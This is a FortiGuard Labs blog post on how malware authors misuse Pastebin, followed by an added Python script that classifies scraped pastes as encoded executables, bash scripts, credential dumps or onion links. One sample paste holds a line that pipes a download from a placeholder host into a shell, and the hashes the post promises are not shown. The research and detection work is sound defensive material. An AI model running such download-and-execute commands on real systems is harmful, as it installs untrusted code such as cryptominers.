FortiGuard Labs Threat Research

The Malicious Use of Pastebin

By Amir Zali | August 02, 2019

FortiGuard Labs Threat Research Report

The FortiGuard Labs threat research team has been noticing for some time that Pastebin and similar services are being used by malware authors, sometimes to evade detection or to obscure their purposes. However, we had no idea how common this practice is or what sorts of malicious content might be stored there. To get to the bottom of this, I decided to scrape Pastebin myself to see what is going on.

What is Pastebin, and How Do Bad Actors Use It?

Tools like Pastebin can be used to share plain-text data over the internet with just a link. But not everyone uses this service in the same way or for innocent purposes. Malware authors, for example, often use Pastebin, or services like it, to store part of the malicious content from their malware, and then fetch it later from inside the malicious executable using the share link. A recent FortiGuard Labs blog on the Rocke coin mining malware shows one practical use case for this practice.

Malicious Uses for Pastebin

To take a closer look at this practice, and see how prevalent the misuse of this service is by cyber criminals, I decided to scrape all the pastes in Pastebin and process them for malicious content. At first, my goal was to look up malicious files, since Pastebin can be used as an evasion technique. However, what I discovered was a wide variety of malicious scripts, stolen credentials, encoded content, and malware. The result of this research, based on examining thousands of pastes, is as follows.

Base64 Encoded Content: Over 8,000 of these files fell into this category. Among them were obfuscated scripts, some hashes, and a great deal of binary data. Surprisingly, I also found some ELF/PE executable files. Listed below are the MD5 hashes of a few of these files and their status on VirusTotal.

Bash Script Files: Another approximately 1,000 files were bash script files. Most of the files were cryptocurrency miners and scripts used to install services. Otherwise, I couldn’t detect anything special about them using my filtering scripts.

Credentials and Sensitive Information: Over 6,000 of these files claimed to include stolen and hacked usernames and passwords for a variety of services, such as Spotify and Netflix, as well as some credit card information.

Encoded Content: Over 4,000 pastes contained encoded or random text strings, encryption keys, public and private cryptocurrency keys and wallets, a number of obfuscated PHP or JavaScript scripts, authentication tokens hardcoded in script files, onion service links (addresses in the Tor network), and, last but not least, a lot of links to cracked software and/or movies (copyright-protected content).

Source Files: 3,000 of these pastes included source files written in PowerShell, Python, JavaScript, and other languages. Among those, I was able to detect PoC files related to public vulnerabilities.
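To make the triage described above concrete, here is an added example (not part of the FortiGuard research or its tooling) of the kind of filtering script that sorts scraped pastes into the categories listed: it decodes whole-paste base64 blobs and checks for ELF/PE magic, and applies simple heuristics for bash installers, credential dumps and onion links. The paste bodies are constructed samples, and the regexes and category names are my own assumptions.

```python
import base64
import binascii
import re

# Constructed sample pastes (not real Pastebin data) standing in for the
# categories the survey found: executables smuggled as base64, a
# cryptominer-style bash installer, a credential dump and an onion link.
SAMPLE_PASTES = {
    "p1": base64.b64encode(b"\x7fELF\x02\x01\x01" + b"\x00" * 57).decode(),
    "p2": "#!/bin/bash\ncurl -s http://example.invalid/miner | sh\n",
    "p3": "user1@example.com:Hunter2\nuser2@example.com:Passw0rd!\n",
    "p4": "mirror: http://exampleonionaddressxyz.onion/\n",
    "p5": "Just some release notes, nothing to see here.\n",
    "p6": base64.b64encode(b"MZ" + b"\x00" * 62).decode(),
}

# Heuristic: a paste that is one long run of base64 alphabet (line wraps allowed).
B64_RE = re.compile(r"^[A-Za-z0-9+/=\s]{40,}$")
# "email:password" combo-list lines, as seen in credential dumps.
CRED_RE = re.compile(r"^[\w.+-]+@[\w.-]+:\S+$", re.MULTILINE)
# v2 (16 chars) and v3 (56 chars) Tor onion service addresses.
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")

def decode_if_base64(text):
    """Return decoded bytes when the whole paste is a base64 blob, else None."""
    if not B64_RE.match(text.strip()):
        return None
    try:
        return base64.b64decode("".join(text.split()), validate=True)
    except (binascii.Error, ValueError):
        return None

def classify_paste(text):
    """Map one paste body to a category from the survey above."""
    raw = decode_if_base64(text)
    if raw is not None:
        if raw.startswith(b"\x7fELF"):      # Linux executable magic
            return "base64_encoded_elf"
        if raw.startswith(b"MZ"):           # Windows PE/DOS header magic
            return "base64_encoded_pe"
        return "base64_encoded"
    first_line = text.lstrip().splitlines()[0] if text.strip() else ""
    if first_line.startswith("#!") and "bash" in first_line:
        return "bash_script"
    if len(CRED_RE.findall(text)) >= 2:
        return "credentials"
    if ONION_RE.search(text):
        return "encoded_or_onion"
    return "benign_or_unknown"

def classify_all(pastes):
    """Classify a {paste_id: body} mapping, e.g. the output of a scraper."""
    return {pid: classify_paste(body) for pid, body in pastes.items()}
```

Decoded blobs that carry executable magic are the ones worth feeding to a sandbox or hash lookup; the other categories are only coarse labels for further review.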

Pastebin is Just the Tip of the Iceberg

I only checked the Pastebin service for malicious files, but there are a number of similar services that cyber criminals may use in this way. However, some of them don’t index posted entries, so they are not easy to scrape. Because of this, they may be even more interesting to cyber criminals – which also means the content on these other services may be even more interesting to cybersecurity professionals.

Learn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolio.

Learn more about Fortinet’s free cybersecurity training initiative or about the Fortinet NSE Training program, Security Academy program, and Veterans program.